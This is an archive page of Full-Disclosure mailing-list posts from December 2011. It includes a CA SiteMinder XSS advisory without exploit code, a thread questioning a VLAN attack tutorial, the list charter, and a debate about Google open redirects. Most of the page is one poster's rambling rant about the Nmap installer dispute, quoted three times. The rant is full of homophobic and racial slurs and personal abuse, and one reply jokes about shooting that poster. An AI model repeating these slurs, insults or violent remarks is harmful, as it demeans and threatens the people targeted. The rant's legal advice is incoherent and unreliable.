Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial
As i told Fy0d0r , in a case where, the actual breaching of a contract occurs, this == compensation for having ie: name trashed hard coz, who knows howmany new to nmap users are using it, and, wish i had not installed it but...ohwell, ill just have to reinstall.. And, thats it most ppl settle for this.. i have not formatted snce i have bought, ALL of the pcs/boxes,expect when on some testing boxes, wich atre offline... and now, managed to hack my own 'secure' wpa2 :s , it even has a bloody app todo it :s so, ye, it is a big area wich, i tried so hard this year and, alot of posts about this and, see...where isall these experts of FD now ? I mean, it is hosted by a darn vuln db, yu could easily, easily point finger, and, say well secunia is a copany and, should be able to offer *soubnd* advice..anyhow, as an ex con, i will say for this particular case,in fyod0r nmap one, wich is, probably akin or, similar to this bug here this guy is havingand, NO ONE KNOWS who to even ask for seruious help...well, i will tell you who. If it is for real, and your serious, then, you file a FBI report, THEN ring local LEA , and explain exactly, asking ofcourse b4, for the IT department, who handle cyber crimes... they SHOULD patch u thru simply... but, if hello mates! NOT, then, you need to get a LAWYER or, a 'voice' and, as i have prooven, FD has NO voice in this area, yet it pretends to have, alot of it and, it has not offered this guy even,advice wich i was givem and stuck with, and, never have spojken anything to police since, when i was arrested, that was easy, my father said, you never 'dog' or narq on a friend, and, you never run from your probl;ems, even if theyre mountains, because if you atleast climb the mountain, you can start breaking it down... Now, if you want to get someone arrested, you neeed some SERIOUS log activity, Irc PMs, anything wich can helpm but, webite infos is always, easiest and best way.. but,. like them PTC and Ponzi, i guess were fucked hard, from [ppl, many of the ppl, asking for theyre darn cash... wich, i swear this compabny bux.to is next..but anyhow, that owner,someone , i have nfi who, posted a copant to online fbi and, with logs showed that, they had been ripped, now, i had like, 3 bux in my acct... and, i guess now when fbi sent me papers to fillin for damages, iclaimed for the...trauma it caused me, and my family ;'( anyhow, thats to sad to mention. i will continue onto the rest, now, getting a LARGE gropup of ppl together, ANYWHERE, is a 'voice' and, online there is somany people like Dan, Spender, kcope and, many many others who could easily makesure the scene, was alot nicer...specially whe it comes to i mean, kernel.org, being owned..now, whats in some of the kernels, who knows.. but if u know who did it, then, id expect anythin... So, why did not they get the people arrested or somethin then ??? I also ask myself this... but, i only think, if the person is smart enough to stay in places, where ther is no treatys, then, theyre gone..you loose.. but if theyre in usa, you can just report them to fbi, but, inn the nmap case, id have, gone str8 for a mouthpiece/;aswyer...and, get serious, legal assistance, coz, if you were to takeon cbn or, download.com err cnet/..theyre multi million dollar companies so, it is not gonna be easy so, i just hope, that one day FD grows a voice, because, people should not HAVE to be asking this...andgoogleing for results is, useless, you MUST get the matter, offline, and, into a civil court...then, youcan sue, or request things, etc, like, theyre banned to use something, for some time... or, anything aslong, as justice gets served...then, we would be knowing, there IS a prescence online... but... i can say now, i am about to put a post upm, within next cpl of days, wich is going to blow the heads off anything wikileaks has done.. and... screwit, i found this thing, so , i am going to share the discovery.. and, hopefully, some bank shuts me up with some bribe money... thats another way togo, settle out-of court session,...can be OK, depending on case..but, either way, you must get the people, to actually be served... Thats the ONLY way you get anything done, and yea, it does maybe take a shitload of time i guss but, id rather that than b scared as fuck of nothing, because, there is nothing put online, to say you can and cant do this , if thats the cas then, wtf is download.com thinking ? simple.. they have a contract, they madesure there was fine print inbetween some lines wich are usually actually placed, psychologically so the user feels almost obliged to do what is asked of them... aliot on the networks nowdays use psychoogu, and, thats because, there is no body language... this is why, cases are so hard to bring to trial to start with.. no human contact, makes it hard for people to arrest someone, with no fixed address...well, on the run say... i know ppl on the run, still 10yrs, shoot police even, just 1week ago,and still
Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial
I bet Gordon was glad to get that email. On Fri, Dec 9, 2011 at 5:13 PM, xD 0x41 sec...@gmail.com wrote: As i told Fy0d0r ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial
Oh wow anothwer fucking genius! Upir actually know him, why arent you a nice guy who thimks theyre top shit..but again, as alwys, offering VERY little helpf for *gordon* are you...dickhead thats what makes me angry about thsi list..look at whats been done, to the no.1 pentestin app EVERY1 of u has used in some form...and, you cannot even figure out, hwo to help the guy like, ive seeen yo0u make more of a fucking fuss. over some bs topic that meant nothing but trolling and abuse... yet when it is time to REALLY help, only few remain... lamers...and believe me, i dont need FD to tell me shit, and prosec, your fucking over... stupid gay faggots... you and your arsehole mates at GNAA are gonna regret being the arseholes you are today... i know, my friend there at fibertel, is definately.. but, dont worry, this troll will come running now from gnaa ,the gay Nigger Association of America ? right... wel, thts what the ezxines say... :P So, whos going to offer REAL DAMN ONLINE SEC HELP HERE , SIMPLE DONT POINT ANY FINGERS, NOR CHANGE THE DARN TIC, IF YOU BELIEVE IN SOMETHING, AND SOMEONE WHO IS HELPING YOU THEN GET THE FUCK UP OFF YOUR ASS, AND ATLEAST, HELP HIM MAYBE SIGN A NICE BIGARSE LIST OF COMPLAINEES WHO *USE TYHE SOFTWAFRE* AND, ALSO, SOME WHO HAVE EXPERINCED THE BAD INSTALLER... NOW, WHEN YOU MAYBE, DO SOMETHIN USEFUL, ON THE LIST HERE, LIKE, THIS IS BEING IGNORED... ANDF, I SEE THAT FYODOR, AND, I DUN CARE WHAT OR WHO THE FK HE IS, GOT ME ? IT IS ABOUT ONLINE SECURITY, AND WHERE OUR BVOICES ARE HEARD... IS THIS GOING TO NOW TUIRN INTO A BS JOKE , OR, IS PEOPLE GOING TO MAYBE, ACTUALLY MAKE THE VOICE AM ASKING YOU TO MAKE, BUT, MAKE THE NOISE, ABOUT WHATS HAPPENED TO NMAP,, AND, I HOPE THAT GORDON, OR WHOEVER THE FK HE IS, CAN ATLEAST SPELL THE DAQMN LAWYERS NAME COZ, SOFAR, HE IS RELYING ON online HELP FOR AN offline MATTER...SORRY BUT, IT STARTED ONLINE, but THEY BREACHED CONTRACT, BRINGING IT BACK, TO CIVIL, THEN CRIMINAL...SO, GO TELL ME SSOMETHING I DONT KNOW, AND MAYBE WE WILL SEE SOME HELP, FOR REAL HERE... SERIOUSLY, THINK ABOUT IT, IF THIS WAS YOUR DAMN TOOL, YOU HAD HELPED 'HAX0RS' USE, FOR 10YRS OR WHAT, AND, YOU GET NOTHING BUT, TRIED TO BE HIDDEN AWAY AND, TOLD TO DO THIS AND THAT, BUT, NOTHING ONLINE, WILL HELP..SIMPLE... SO, I DUN CARE WHO TAKES MY ADVICE, I WAS, AND, DID, ALOT FO TIME..SOP, KNOW ATLEAST MY RIGHTS..AND THE RIGHTS OF THE GORDON...WICH, WAS BREACHED. HE COULD SUE HARD, IF HE WAS SMART, AND DID NOT LISTEN TO FAGGOTS ONLINE TELLING HIM GOD KNOWS WHATTODO BUT, NOT TELLING HIM, TO GET LEGAL AID FIORST...AND, THIS IS THE PRIME THING, ANYIONE DOES IN ANY CASE, REQUEST A LAWYER, HEY, WATCH SOME LA CRIME SHOWS, YOU MAY EVEN LEARN, FROM HOW FKD UP USA IS,... AND HOW THE COURT SYSTEM IS, AND, THIS WOULD STILL, EVEN IF TAKENM TO COURT, PROBABLY BE A HEADLINE, AS IT HAS NOT HAPPENED B4... IF, PEOPLE TREATE THIS SERIOUSLY... IT DOES NOT MATTER, ABOUT WHO OR WHAT GORDON IS..IT MATTERS, ABOUT WHO THE VOICE IS, WICH WE HAVE..AND, IF YOU WANNA BAG ME, GO RIGHT AHEAD BUT, DONT TELL ME, I AM WRONG.. MATE AND, IF YOU DOWELL, I WOULD SAY, ,LOOKUP THE DIFFERENCES, BETWEEN A REPUBLIC, AND A DEMOCRACY, AND, A PRESIDENTIAL STATE...AND, THE SYSTEMS, WICH RULE THE ACTS,W ICH FORM THE BIL;LS, WICH GET PASSED IN PARLIAMENT... THIS CANNOT BE DONE, ON AN ONLINE FORM! WAKE THE FUCK UP, AND SERIOUSLY, LOOK AROUND YOUR NOT GUILTY OF ANYTHING RIGHT ? SO, WHWHY NOT TRY HELP, OR, OFFER SOME ADVICE THATS ATLEAST WORTHY... YOU CAN NOW RESUME ANY BAGGING, BUT REMEMBER IT IS AT THE EXPENSE AND TIME, THAT NMAP HAS...AND BELIEVE ME CNET IS WATCHING THIS INTENTLY... BECAUSE THEYRE WAITING FO THE 'OFFER' TO SETTLE ;) WHEN IM WRONG, THEN SLAP ME, UNTIL THEN STFU. On 9 December 2011 20:39, tc toughcr...@gmail.com wrote: I bet Gordon was glad to get that email. On Fri, Dec 9, 2011 at 5:13 PM, xD 0x41 sec...@gmail.com wrote: As i told Fy0d0r ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VLAN Hacking Tutorial at InfoSec Institute
On Thu, Dec 8, 2011 at 8:49 PM, Adam Behnke a...@infosecinstitute.comwrote: Ever wanted to learn how to hack a VLAN? Here is a tutorial for all of you: ** ** http://resources.infosecinstitute.com/vlan-hacking/ ** ** 1. ARP Attack 2. MAC Flooding Attack 3. DHCP attack 4. Spanning-Tree Protocol Attack 5. Multicast Brute Force Attack 6. Private VLAN Attack 7. VLAN Hopping Attack 8. Double-Encapsulated 802.1Q 9. Random Frame Stress Attack May be I am just ignorant but, just explain how an ARP packet from one VLAN enters another? And while you are at it, how MAC Flooding/DHCP attack is anyway related to VLANs in first place? MemoryVandal ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VLAN Hacking Tutorial at InfoSec Institute
This tutorial just rehashes ancient techniques in a general way in spotty english.The insecurity of ARP among other issues listed are problems on any layer 2 network and have little to do with VLAN. ARP flooding to make a switch go into hub mode hasn't been an issue in decent switches for quite a few years now. The Cisco whitepaper referenced at the bottom is worth a read though because proper configuration is indeed important: http://www.cisco.com/en/US/products/hw/switches/ps708/products_white_paper09186a008013159f.shtml The @Stake VLAN security whitepaper is a good read also: http://www.cisco.com/warp/public/cc/pd/si/casi/ca6000/tech/stake_wp.pdf Most importantly, it says: The results of @stake’s test sequences clearly demonstrate that edge technologies, including tools such as VLANs on Cisco Catalyst switches, when configured according to best- practice guidelines, can be effectively deployed as security mechanisms.” On Thu, Dec 8, 2011 at 7:19 AM, Adam Behnke a...@infosecinstitute.comwrote: Ever wanted to learn how to hack a VLAN? Here is a tutorial for all of you: ** ** http://resources.infosecinstitute.com/vlan-hacking/ ** ** ** ** ** ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright jo...@grok.org.uk - Introduction Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclosure@lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a consensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CA20111208-01: Security Notice for CA SiteMinder
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CA20111208-01: Security Notice for CA SiteMinder
Issued: December 08, 2011
CA Technologies Support is alerting customers to a potential risk in
CA SiteMinder. A vulnerability exists that can allow a malicious user
to execute a reflected cross site scripting (XSS) attack. CA
Technologies has issued patches to address the vulnerability.
The vulnerability, CVE-2011-4054, occurs due to insufficient
validation of postpreservationdata parameter input utilized in the
login.fcc form. A malicious user can submit a specially crafted
request to effectively hijack a victim’s browser.
Risk Rating
Medium
Platform
All
Affected Products
CA SiteMinder R6 SP6 CR7 and earlier
CA SiteMinder R12 SP3 CR8 and earlier
Non-Affected Products
CA SiteMinder R6 SP6 CR8
CA SiteMinder R12 SP3 CR9
How to determine if the installation is affected
Check the Web Agent log or Installation log to obtain the installed
release version. Note that the webagent.log file name is
configurable by the SiteMinder administrator.
Solution
CA is issuing patches to address the vulnerability.
CA SiteMinder R6:
Upgrade to R6 SP6 CR8 or later (Expected Availability: January 2012)
CA SiteMinder R12:
Upgrade to R12 SP3 CR9 or later
CR releases can be found on the CA SiteMinder
Hotfix/Cumulative Release page:
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5AE61E
29-C3DE-405E-9151-9EEA72D965CE}.
Workaround
None
References
CVE-2011-4054 - CA SiteMinder login.fcc XSS
Acknowledgement
CVE-2011-4054 - Jon Passki of Aspect Security, via CERT
Change History
Version 1.0: Initial Release
If additional information is required, please contact CA
Technologies Support at https://support.ca.com.
If you discover a vulnerability in CA Technologies products, please
report your findings to the CA Technologies Product Vulnerability
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilj...@ca.com
-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8
wj8DBQFO4glXeSWR3+KUGYURAotyAJ4nT1pij7Nb2uOCKgXnhGvK5If7DgCfX5ht
GdIeR80Ie/6he0y0K5uQLoQ=
=U3C2
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial
Okay.. I'd be happy to help you, but could you rephrase the question? So, whos going to offer REAL DAMN ONLINE SEC HELP HERE , SIMPLE On Fri, Dec 9, 2011 at 5:27 AM, xD 0x41 sec...@gmail.com wrote: Oh wow anothwer fucking genius! Upir actually know him, why arent you a nice guy who thimks theyre top shit..but again, as alwys, offering VERY little helpf for *gordon* are you...dickhead thats what makes me angry about thsi list..look at whats been done, to the no.1 pentestin app EVERY1 of u has used in some form...and, you cannot even figure out, hwo to help the guy like, ive seeen yo0u make more of a fucking fuss. over some bs topic that meant nothing but trolling and abuse... yet when it is time to REALLY help, only few remain... lamers...and believe me, i dont need FD to tell me shit, and prosec, your fucking over... stupid gay faggots... you and your arsehole mates at GNAA are gonna regret being the arseholes you are today... i know, my friend there at fibertel, is definately.. but, dont worry, this troll will come running now from gnaa ,the gay Nigger Association of America ? right... wel, thts what the ezxines say... :P So, whos going to offer REAL DAMN ONLINE SEC HELP HERE , SIMPLE DONT POINT ANY FINGERS, NOR CHANGE THE DARN TIC, IF YOU BELIEVE IN SOMETHING, AND SOMEONE WHO IS HELPING YOU THEN GET THE FUCK UP OFF YOUR ASS, AND ATLEAST, HELP HIM MAYBE SIGN A NICE BIGARSE LIST OF COMPLAINEES WHO *USE TYHE SOFTWAFRE* AND, ALSO, SOME WHO HAVE EXPERINCED THE BAD INSTALLER... NOW, WHEN YOU MAYBE, DO SOMETHIN USEFUL, ON THE LIST HERE, LIKE, THIS IS BEING IGNORED... ANDF, I SEE THAT FYODOR, AND, I DUN CARE WHAT OR WHO THE FK HE IS, GOT ME ? IT IS ABOUT ONLINE SECURITY, AND WHERE OUR BVOICES ARE HEARD... IS THIS GOING TO NOW TUIRN INTO A BS JOKE , OR, IS PEOPLE GOING TO MAYBE, ACTUALLY MAKE THE VOICE AM ASKING YOU TO MAKE, BUT, MAKE THE NOISE, ABOUT WHATS HAPPENED TO NMAP,, AND, I HOPE THAT GORDON, OR WHOEVER THE FK HE IS, CAN ATLEAST SPELL THE DAQMN LAWYERS NAME COZ, SOFAR, HE IS RELYING ON online HELP FOR AN offline MATTER...SORRY BUT, IT STARTED ONLINE, but THEY BREACHED CONTRACT, BRINGING IT BACK, TO CIVIL, THEN CRIMINAL...SO, GO TELL ME SSOMETHING I DONT KNOW, AND MAYBE WE WILL SEE SOME HELP, FOR REAL HERE... SERIOUSLY, THINK ABOUT IT, IF THIS WAS YOUR DAMN TOOL, YOU HAD HELPED 'HAX0RS' USE, FOR 10YRS OR WHAT, AND, YOU GET NOTHING BUT, TRIED TO BE HIDDEN AWAY AND, TOLD TO DO THIS AND THAT, BUT, NOTHING ONLINE, WILL HELP..SIMPLE... SO, I DUN CARE WHO TAKES MY ADVICE, I WAS, AND, DID, ALOT FO TIME..SOP, KNOW ATLEAST MY RIGHTS..AND THE RIGHTS OF THE GORDON...WICH, WAS BREACHED. HE COULD SUE HARD, IF HE WAS SMART, AND DID NOT LISTEN TO FAGGOTS ONLINE TELLING HIM GOD KNOWS WHATTODO BUT, NOT TELLING HIM, TO GET LEGAL AID FIORST...AND, THIS IS THE PRIME THING, ANYIONE DOES IN ANY CASE, REQUEST A LAWYER, HEY, WATCH SOME LA CRIME SHOWS, YOU MAY EVEN LEARN, FROM HOW FKD UP USA IS,... AND HOW THE COURT SYSTEM IS, AND, THIS WOULD STILL, EVEN IF TAKENM TO COURT, PROBABLY BE A HEADLINE, AS IT HAS NOT HAPPENED B4... IF, PEOPLE TREATE THIS SERIOUSLY... IT DOES NOT MATTER, ABOUT WHO OR WHAT GORDON IS..IT MATTERS, ABOUT WHO THE VOICE IS, WICH WE HAVE..AND, IF YOU WANNA BAG ME, GO RIGHT AHEAD BUT, DONT TELL ME, I AM WRONG.. MATE AND, IF YOU DOWELL, I WOULD SAY, ,LOOKUP THE DIFFERENCES, BETWEEN A REPUBLIC, AND A DEMOCRACY, AND, A PRESIDENTIAL STATE...AND, THE SYSTEMS, WICH RULE THE ACTS,W ICH FORM THE BIL;LS, WICH GET PASSED IN PARLIAMENT... THIS CANNOT BE DONE, ON AN ONLINE FORM! WAKE THE FUCK UP, AND SERIOUSLY, LOOK AROUND YOUR NOT GUILTY OF ANYTHING RIGHT ? SO, WHWHY NOT TRY HELP, OR, OFFER SOME ADVICE THATS ATLEAST WORTHY... YOU CAN NOW RESUME ANY BAGGING, BUT REMEMBER IT IS AT THE EXPENSE AND TIME, THAT NMAP HAS...AND BELIEVE ME CNET IS WATCHING THIS INTENTLY... BECAUSE THEYRE WAITING FO THE 'OFFER' TO SETTLE ;) WHEN IM WRONG, THEN SLAP ME, UNTIL THEN STFU. On 9 December 2011 20:39, tc toughcr...@gmail.com wrote: I bet Gordon was glad to get that email. On Fri, Dec 9, 2011 at 5:13 PM, xD 0x41 sec...@gmail.com wrote: As i told Fy0d0r ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 82, Issue 20
Message: 10 Date: Fri, 9 Dec 2011 21:27:14 +1100 From: xD 0x41 sec...@gmail.com Subject: Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial To: tc toughcr...@gmail.com Cc: full-disclosure@lists.grok.org.uk Message-ID: CALCvwp7PMevN414KEcXRPA=Z06173EOv+K5=3hgmb_qow-7...@mail.gmail.com Content-Type: text/plain; charset=ISO-8859-1 Oh wow anothwer fucking genius! Upir actually know him, why arent you a nice guy who thimks theyre top shit..but again, as alwys, offering VERY little helpf for *gordon* are you...dickhead I'm actually starting to miss mustlive's posts after reading these kinds of messages. Reminds me of the cheesy/ugly page defacements that always seem to be written in turkish or arabic found on php shelled sites, albeit without that awful parody of rapping that usually accompanies it. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial
Oh boy! I can't believe someone can be insane to the point of writing
like that.
Netdev, do you expect that people are going to spend more than 2 secs
reading it?
What's wrong with *so many* people on this list?
Thanks god there is sieve :
elsif anyof(
...
header :contains From sec...@gmail.com
) {
discard;
}
--
phocean 0...@phocean.net
Le vendredi 09 décembre 2011 à 21:27 +1100, xD 0x41 a écrit :
Oh wow anothwer fucking genius!
Upir actually know him, why arent you a nice guy who thimks theyre top
shit..but again, as alwys, offering VERY little helpf for *gordon* are
you...dickhead thats what makes me angry about thsi list..look at
whats been done, to the no.1 pentestin app EVERY1 of u has used in
some form...and, you cannot even figure out, hwo to help the guy like,
ive seeen yo0u make more of a fucking fuss. over some bs topic that
meant nothing but trolling and abuse... yet when it is time to REALLY
help, only few remain... lamers...and believe me, i dont need FD to
tell me shit, and prosec, your fucking over... stupid gay faggots...
you and your arsehole mates at GNAA are gonna regret being the
arseholes you are today... i know, my friend there at fibertel, is
definately.. but, dont worry, this troll will come running now
from gnaa ,the gay Nigger Association of America ? right... wel, thts
what the ezxines say... :P
So, whos going to offer REAL DAMN ONLINE SEC HELP HERE , SIMPLE
DONT POINT ANY FINGERS, NOR CHANGE THE DARN TIC, IF YOU BELIEVE IN
SOMETHING, AND SOMEONE WHO IS HELPING YOU THEN GET THE FUCK UP OFF
YOUR ASS, AND ATLEAST, HELP HIM MAYBE SIGN A NICE BIGARSE LIST OF
COMPLAINEES WHO *USE TYHE SOFTWAFRE* AND, ALSO, SOME WHO HAVE
EXPERINCED THE BAD INSTALLER... NOW, WHEN YOU MAYBE, DO SOMETHIN
USEFUL, ON THE LIST HERE, LIKE, THIS IS BEING IGNORED... ANDF, I SEE
THAT FYODOR, AND, I DUN CARE WHAT OR WHO THE FK HE IS, GOT ME ? IT IS
ABOUT ONLINE SECURITY, AND WHERE OUR BVOICES ARE HEARD... IS THIS
GOING TO NOW TUIRN INTO A BS JOKE , OR, IS PEOPLE GOING TO MAYBE,
ACTUALLY MAKE THE VOICE AM ASKING YOU TO MAKE, BUT, MAKE THE NOISE,
ABOUT WHATS HAPPENED TO NMAP,, AND, I HOPE THAT GORDON, OR WHOEVER THE
FK HE IS, CAN ATLEAST SPELL THE DAQMN LAWYERS NAME COZ, SOFAR, HE IS
RELYING ON online HELP FOR AN offline MATTER...SORRY BUT, IT STARTED
ONLINE, but THEY BREACHED CONTRACT, BRINGING IT BACK, TO CIVIL, THEN
CRIMINAL...SO, GO TELL ME SSOMETHING I DONT KNOW, AND MAYBE WE WILL
SEE SOME HELP, FOR REAL HERE...
SERIOUSLY, THINK ABOUT IT, IF THIS WAS YOUR DAMN TOOL, YOU HAD HELPED
'HAX0RS' USE, FOR 10YRS OR WHAT, AND, YOU GET NOTHING BUT, TRIED TO BE
HIDDEN AWAY AND, TOLD TO DO THIS AND THAT, BUT, NOTHING ONLINE, WILL
HELP..SIMPLE... SO, I DUN CARE WHO TAKES MY ADVICE, I WAS, AND, DID,
ALOT FO TIME..SOP, KNOW ATLEAST MY RIGHTS..AND THE RIGHTS OF THE
GORDON...WICH, WAS BREACHED.
HE COULD SUE HARD, IF HE WAS SMART, AND DID NOT LISTEN TO FAGGOTS
ONLINE TELLING HIM GOD KNOWS WHATTODO BUT, NOT TELLING HIM, TO GET
LEGAL AID FIORST...AND, THIS IS THE PRIME THING, ANYIONE DOES IN ANY
CASE, REQUEST A LAWYER, HEY, WATCH SOME LA CRIME SHOWS, YOU MAY EVEN
LEARN, FROM HOW FKD UP USA IS,... AND HOW THE COURT SYSTEM IS, AND,
THIS WOULD STILL, EVEN IF TAKENM TO COURT, PROBABLY BE A HEADLINE, AS
IT HAS NOT HAPPENED B4... IF, PEOPLE TREATE THIS SERIOUSLY... IT DOES
NOT MATTER, ABOUT WHO OR WHAT GORDON IS..IT MATTERS, ABOUT WHO THE
VOICE IS, WICH WE HAVE..AND, IF YOU WANNA BAG ME, GO RIGHT AHEAD
BUT, DONT TELL ME, I AM WRONG.. MATE AND, IF YOU DOWELL, I WOULD
SAY, ,LOOKUP THE DIFFERENCES, BETWEEN A REPUBLIC, AND A DEMOCRACY,
AND, A PRESIDENTIAL STATE...AND, THE SYSTEMS, WICH RULE THE ACTS,W ICH
FORM THE BIL;LS, WICH GET PASSED IN PARLIAMENT... THIS CANNOT BE DONE,
ON AN ONLINE FORM!
WAKE THE FUCK UP, AND SERIOUSLY, LOOK AROUND YOUR NOT GUILTY OF
ANYTHING RIGHT ? SO, WHWHY NOT TRY HELP, OR, OFFER SOME ADVICE THATS
ATLEAST WORTHY...
YOU CAN NOW RESUME ANY BAGGING, BUT REMEMBER IT IS AT THE EXPENSE AND
TIME, THAT NMAP HAS...AND BELIEVE ME CNET IS WATCHING THIS INTENTLY...
BECAUSE THEYRE WAITING FO THE 'OFFER' TO SETTLE ;)
WHEN IM WRONG, THEN SLAP ME, UNTIL THEN STFU.
On 9 December 2011 20:39, tc toughcr...@gmail.com wrote:
I bet Gordon was glad to get that email.
On Fri, Dec 9, 2011 at 5:13 PM, xD 0x41 sec...@gmail.com wrote:
As i told Fy0d0r
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter:
Re: [Full-disclosure] VLAN Hacking Tutorial at InfoSec Institute
May be I am just ignorant but, just explain how an ARP packet from one VLAN enters another? Very carefully. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google open redirect
On 12/08/2011 12:37 AM, Michal Zalewski wrote: For time being, if you make security decisions based on onmouseover tooltips, link text, or anything along these lines, and do not examine the address bar of the site you are ultimately interacting with, there is very little any particular web application can do to save you: you are just at a significant risk wherever you go. If you take away open redirectors, a myriad of other, comparable ways to fool you remain, and can't be fixed easily. I think reasoning based on this is subtly fallacious and it often contributes to disagreements between researchers and large vendors. This is how we got into the state of the web today: bad faith on the part of browser vendors. They may be in the minority, but there *are* users out there who know how to look at the address bar. The security researcher knows this because he is one of them. I call this group the competent and contentious users. Large vendors are constantly holding bad faith against their userbase. This may be borne out by large user studies, but I've lost count of the number of times I've heard actual security improvements shot down because typical users are presumed to be so incompetent and careless that they will fail to derive a significant benefit from it. I maintain that design decisions affecting security must be driven by the needs of the competent and contentious user because if he cannot achieve effective security in using of the system, then what chance has the typical user?! Avoiding security improvements because the are perceived as being of little benefit to type typical user is wrong. Doing so gains nothing for the typical users, it decreases the security available to competent and contientious users, and worst of all it actively removes any incentives for the typical user to begin to take responsibility for their own security. I think when the typical user gets pwned with phishing or malware he thinks a combination of stupid Microsoft, the Internet is out to get me, and what did I do wrong?. The vendor implicitly answers: you did nothing wrong because this is all too complicated for you to understand, you should install this additional product to give you better security. Perhaps this made sense back when the Internet was a toy and the biggest security risk was a limited-liability credit card number, but today we have whole populations in places like Iran wondering if their ass is going to get tortured over something they said on social media. I think a lot of typical users today are probably wanting to move into that other category and we should support them in that. - Marsh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial
On 12/9/2011 1:39 PM, phocean wrote:
Oh boy! I can't believe someone can be insane to the point of writing
like that.
Netdev, do you expect that people are going to spend more than 2 secs
reading it?
What's wrong with *so many* people on this list?
Thanks god there is sieve :
elsif anyof(
...
header :contains From sec...@gmail.com
) {
discard;
}
In Texas they'd have taken N3tD3v out back years ago and shot him as
unfixably defective.
Andrew
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google open redirect
